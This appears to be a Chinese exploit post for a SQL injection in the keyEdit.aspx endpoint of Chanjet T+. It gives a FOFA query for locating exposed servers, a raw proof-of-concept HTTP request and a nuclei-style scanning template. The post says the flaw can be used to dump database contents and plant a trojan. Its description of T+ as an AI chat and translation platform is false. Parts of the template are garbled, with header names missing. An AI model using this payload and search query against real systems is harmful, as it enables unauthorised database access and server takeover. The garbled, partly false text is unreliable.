请勿利用文章内的相关技术从事非法测试,由于传播、利用此文所提供的信息而造成的任何直接或者间接的后果及损失,均由使用者本人负责,作者不为此承担任何责任。工具来自网络,安全性自测,如有侵权请联系删除。
畅捷通t+是一款智能人工智能通信服务平台,利用先进的自然语言处理和机器学习技术,为用户提供高效、便捷的交流和信息查询服务。用户可以通过文本、语音或图像等多种方式与畅捷通t+进行交流,获取信息、解决问题或进行娱乐互动。畅捷通t+具有丰富的功能,包括但不限于日常问答、实时翻译、健康咨询、购物指导、旅行规划等。它能够快速准确地理解用户的需求,为用户提供个性化的服务和解决方案。由于畅捷通T+的keyEdit.aspx接口处未对用户的输入进行过滤和校验,导致存在SQL 注入漏洞,可以通过该漏洞获取数据库中的信息,向服务器中写入木马,进一步获取服务器系统权限。
fofa语法:app="畅捷通-TPlus"
POC:GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1Host: x.x.x.xUpgrade-Insecure-Requests: 1User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Accept-Encoding: gzip, deflate, brAccept-Language: zh-CN,zh;q=0.9Connection: close
id: changjietong_keyEdit_sqliinfo:name: changjietong_keyEdit_sqliauthor: recjlseverity: highdescription: descriptionreference:https://tags: tagsrequests:raw:|+GET /tplus/UFAQD/keyEdit.aspx?KeyID=1%27%20and%201=(select%20@@version)%20--&preload=1 HTTP/1.1Host: {{Hostname}}: max-age=0: 1: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/120.0.0.0 Safari/537.36Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/avif,image/webp,image/apng,*/*;q=0.8,application/signed-exchange;v=b3;q=0.7Referer: http:///tplus/: gzip, deflate, br: zh-CN,zh;q=0.9Cookie: ASP.NET_SessionId=wla51k11mgrzdaydypk0muzb: W/"5b450e7e-666d": Tue, 10 Jul 2018 19:52:30 GMTConnection: close: andmatchers:type: wordpart: bodywords:ion:utype: statusstatus:- 200
